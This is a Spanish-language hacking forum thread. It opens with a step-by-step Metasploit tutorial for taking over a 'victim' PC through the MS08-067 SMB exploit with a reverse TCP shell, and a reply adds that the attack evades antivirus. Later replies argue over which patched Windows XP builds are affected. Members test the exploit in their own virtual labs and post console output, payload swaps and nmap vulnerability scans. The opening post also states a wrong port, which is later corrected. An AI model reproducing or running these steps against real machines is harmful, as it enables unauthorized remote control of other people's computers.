Metasploit | Penetrar una pc. [Exploit]

Iniciado por Payasako, Febrero 17, 2015, 06:06:43 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.


Metasploit | Penetrar una pc.


En este post os pondre un exploit , que sirve para penetrar en una pc.  Me explico mejor paso a paso. Primero teneis que abrir la consola metasploit , si no la teneis descargarla aqui: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Bueno ya tenemos abierta la consola pues ahora pondremos el exploit que queremos usar en este caso es netapi:
Citaruse exploit/windows/smb/ms08_067_netapi

Le damos enter y seguimos , ya tenemos el exploit pues procederemos a decirle a la consola que qué dirección IP queremos atacar o penetrar en este caso metemos este codigo:
Citarset RHOST 000.000.000.000 <- En 000.000.000.000 pondremos la IP a la que queremos atacar.

Ahora meteremos el payload que sera como una shell:
Citarset payload windows/shell/reverse_tcp

Vamos bien , ahora le tenemos que decir a metasploit quien somos pues para eso usaremos el comando:
Citarset LHOST 000.000.000.000 <- En 000.000.000.000 pondremos nuestra IP

Y ahora mandaremos el exploit con un simple comando:
Citarexploit

Bueno ya dejamos que cargue y eso , y una vez con acceso pues podemos poner help y te saldran muchos comandos y podras controlar la pc que pusiste. Quiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

Saludos :)

Gracias  :) añado que no es detectable por el antivirus pero si esta el firewall activo no puede funcionar, habría que usar otro método.

CitarQuiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

El puerto 445.
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Yo quisiera añadir también que esta vulnerabilidad sólo afecta a Windows XP SP1. La actualización a SP2 ya corrige el fallo.
Este exploit es de la prehistoria. ¿En serio esperáis tener resultados con él? Salieron muchísimos parches desde entonces.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Yo quisiera añadir también que esta vulnerabilidad sólo afecta a Windows XP SP1. La actualización a SP2 ya corrige el fallo.
Este exploit es de la prehistoria. ¿En serio esperáis tener resultados con él? Salieron muchísimos parches desde entonces.
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2). Aclarados estos fallos procederé a contestar a tu segunda inquietud. Cualquier auditor de seguridad lloraría hay muchísimos software que por contrato con la empresa obligan a tener el Windows XP en un service pack desactualizado, en caso contrario no ofertarían su soporte por consiguiente son un buen blanco.
Si tienes más dudas te recomiendo que mires estadísticas!
Salu2
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2).
No sé, chico, pero tus estadísticas se desmienten en el laboratorio.
Para más dudas te recomiendo que montes un hacklab y pruebes las cosas.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Agosto 28, 2015, 10:37:17 AM #6 Ultima modificación: Agosto 28, 2015, 10:40:14 AM por MagoAstral
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2).
No sé, chico, pero tus estadísticas se desmienten en el laboratorio.
Para más dudas te recomiendo que montes un hacklab y pruebes las cosas.
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:

(No tienes permitido ver los links. Registrarse o Entrar a mi cuenta). Le recomendaría leer algún tutorial donde expliquen como instalar una máquina virtual en un entorno controlado.
Saludos!
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Agosto 28, 2015, 11:02:18 AM #7 Ultima modificación: Agosto 28, 2015, 11:06:46 AM por rand0m
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:
1º- Eso no es una prueba de concepto. Si quieres llamarlo de alguna manera llámalo Demo.
2º - Sí, podemos preparar un entorno Windows para que sea vulnerable, pero por defecto no lo es.
3º- ¿A qué viene lo de los entornos virtuales? ¿Eres tonto o qué te pasa? Estas capturas son de máquinas corriendo en VMware. ¿A qué viene eso?

--EDIT--
No busques vídeos de terceros. Prueba lo que dices, como hice yo.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:
1º- Eso no es una prueba de concepto. Si quieres llamarlo de alguna manera llámalo Demo.
2º - Sí, podemos preparar un entorno Windows para que sea vulnerable, pero por defecto no lo es.
3º- ¿A qué viene lo de los entornos virtuales? ¿Eres tonto o qué te pasa? Estas capturas son de máquinas corriendo en VMware. ¿A qué viene eso?

--EDIT--
No busques vídeos de terceros. Prueba lo que dices, como hice yo.
1º No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Una prueba de concepto o PoC (por sus siglas en inglés) es una implementación, a menudo resumida o incompleta, de un método o de una idea
2º Acabo de montar un windows xp sp3, desactivado el firewall y explotado correctamente la vulnerabilidad. ¿Magia? Claro no recordaba que era un Mago...
3º Lo primero es que no voy a seguir discutiendo con un necio como es usted, que carece de argumentos y recurre al insulto. Ya no me gustaba esos aires de superioridad, de mirar por encima del hombro y criticar el trabajo de los demás con el tema de los vídeos pero decidí no intervenir. Como asumo que no eras el más rápido de tu clase en comprensión lectora te aclararé, cuando me refería a que mirases un tutorial es porque alomejor estás cometiendo alguna errata en tu laboratorio y ahí subyace el problema de que no puedas realizar tus pruebas de concepto, demostraciones, etc... como quieras llamarlo.
Te dejo unas capturas:
(No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
(No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
Saludos compañero!
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Chicos, me parece genial que se arme debate. Pero haganlo siempre sin insultar.
Los foros estan hechos para debatir, cuidemos la forma nada mas.

Saludos!
ANTRAX


Bueno, visto lo visto he creado una máquina virtual nueva y le he instalado Windows XP SP3, desactivando las actualizaciones automáticas durante la instalación. Los únicos clicks que se hicieron en esta nueva máquina fueron para acceder al Panel de Control y desactivar el firewall.
Al lanzar el exploit no obtenemos un resultado satisfactorio, por eso compruebo la conectividad de la siguiente manera:

  • Hago ping a la máquina WinXPSP3 y ésta responde correctamente (192.168.1.17)
  • Pongo el puerto 4444 a la escucha con netcat y, desde Windows, accedo con Internet Explorer a 192.168.1.15:4444
Ambas pruebas funcionan, por lo que sabemos que la máquina con Kali se comunica correctamente con la máquina Windows y viceversa. Además, por si acaso, me aseguré de que Windows puede realizar conexiones salientes al puerto 4444.
¿Qué ocurre, entonces? Que las instalaciones difieren. Mientras mi disco de Windows instala un sistema parcheado el que utilizó para el ejemplo MagoAstral no instaló tal parche.
Y de ahí que ambos tuviéramos razón: Windows XP SP3 puede ser vulnerable tras la instalación si lo instalamos desde una versión sin parchear. De todas formas los usuarios no suelen desactivar las actualizaciones automáticas, así que si ya es poco probable encontrarnos frente a un WinXP (Sin soporte por parte de M$), menos probable aún será que sea vulnerable a este exploit.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Agosto 28, 2015, 05:16:14 PM #11 Ultima modificación: Agosto 28, 2015, 05:25:16 PM por q3rv0
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta al parecer lo que esta andando mal es el payload no el exploit, proba con alguna shell inversa como windows/meterpreter/reverse_tcp.

Adjunto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Chicos, me parece genial que se arme debate. Pero haganlo siempre sin insultar.
Los foros estan hechos para debatir, cuidemos la forma nada mas.

Saludos!
ANTRAX

Foro, según la tercera acepción de la RAE:

Citar3. m. Reunión para discutir asuntos de interés actual ante un auditorio que a veces interviene en la discusión.

Precisamente, este tipo de intercambio es lo que dinamizan, enriquecen y permiten aprender. No dejéis de hacerlo, siempre guardando las formas (como dijo ANTRAX) que  -todos- son aportes sumamente interesantes.

Gabi.
Tú te enamoraste de mi valentía, yo me enamoré de tu oscuridad; tú aprendiste a vencer tus miedos, yo aprendí a no perderme en tu abismo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta al parecer lo que esta andando mal es el payload no el exploit, proba con alguna shell inversa como windows/meterpreter/reverse_tcp.
En el primer intento que hice fue el que intenté utilizar. Acabo de usarlo contra la máquina nueva y sigue sin dar resultado.

Código: php
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.17     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.14     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Partiendo de aquí hacemos cuantos intentos queramos, que el resultado es el mismo.
Código: php
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.14
LHOST => 192.168.1.14
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...

No sé si es que estoy haciendo algo mal (A lo que agradecería que alguien arrojase algo de luz) o es que realmente el Windows no es vulnerable, como venía diciendo desde el principio.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Me respondo a mí mismo para plantear una respuesta:
CitarOtra hipótesis es que tengas configuradas una políticas de iptables en tu kali de manera que no permite la conexión porque cuando sale el attempting to trigger the vulnerability indica que el meterpreter se ejecuta pero lanza un time out. Puedes probar a cambiar el payload por un bind_tcp.
Otro problema como tu dices sería la red normalmente la gente tiene problema al dejarlo en NAT pero como mencionaste anteriormente la tienes en adaptador puente ¿Has seleccionado replicar el estado?
De primeras el estado de la tarjeta no estaba replicado. Marqué la casilla en la configuración de VMware y arranqué de nuevo. Bien, empezando por las iptables, éstas están desactivadas.
Código: php
root@KaliSana:/home/rand0m# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

He probado a pasarle un scan de vulnerabilidades con nmap y éste es el resultado.
Código: php
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms x-c77d82deb3b94.home (192.168.1.17)

Y como llevo intentando desde ayer el exploit sigue sin funcionar.
Sigo afirmando, convencido a un 90%, que mi CD de instalación instaló un Windows XP SP3 parcheado.
Aunque tampoco os calléis. ¡El debate está abierto y más vivo que nunca!
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Por alguna extraña razón (puede que sea un parche o puede que no) tu samba no permite la interactuación NT_STATUS_ACCESS_DENIED podría ser que estuvieran cacheadas las credenciales o algún otro problema de la misma índole pero lo que me extraña es que no comprueba la integridad de exploit ms08_067. Prueba a ejecutar un "check" y veamos que información te devuelve!
Otra cosa es que si podrías pasar el checksum SHA1 de tu ISO a ver si podemos acortar las rutas de solución ;)
Saludos
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por alguna extraña razón (puede que sea un parche o puede que no) tu samba no permite la interactuación NT_STATUS_ACCESS_DENIED
Hagamos hincapié en que está recién instalado, con todos los valores por defecto excepto el cortafuegos.
Los checks de metasploit dicen que el objetivo no es vulnerable.
Al pie de foto está el SHA1 de la imagen ISO.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Es que tu has descargado una versión de 2013, tienes que descargarte una iso original no una que haya sido alterada.
Prueba con esta: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos!
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Usé el torrent que más actividad tenía porque entiendo que es el que más distribuido está.

La gente que usa Windows se descarga versiones con drivers SATA (¿Alguen aquí todavía usa discos PATA?). Los que instalan versiones de Windows oficiales porque así lo tienen contratado en su empresa (O lo que sea) no lo mantendrán desactualizado. Creo que en esto estaremos todos de acuerdo.

Insisto: Este exploit tuvo su época de oro, pero fue hace más de 5 años. Aún así estoy descargando la ISO que dices y voy a buscar (Si no es ésta), la última versión OEM de Windows XP.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Usé el torrent que más actividad tenía porque entiendo que es el que más distribuido está.

La gente que usa Windows se descarga versiones con drivers SATA (¿Alguen aquí todavía usa discos PATA?). Los que instalan versiones de Windows oficiales porque así lo tienen contratado en su empresa (O lo que sea) no lo mantendrán desactualizado. Creo que en esto estaremos todos de acuerdo.

Aquí estas equivocado parcialmente en Bolivia lastimosamente tengo que decirlo ni contando con licencias hasta ahora siguien siendo vulnerables se llega a tocar hasta las puertas en su totalidad, todo depende de la cultura de manejo de parches lo cual recae en los encargados de TI.

Regards,
Snifer
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!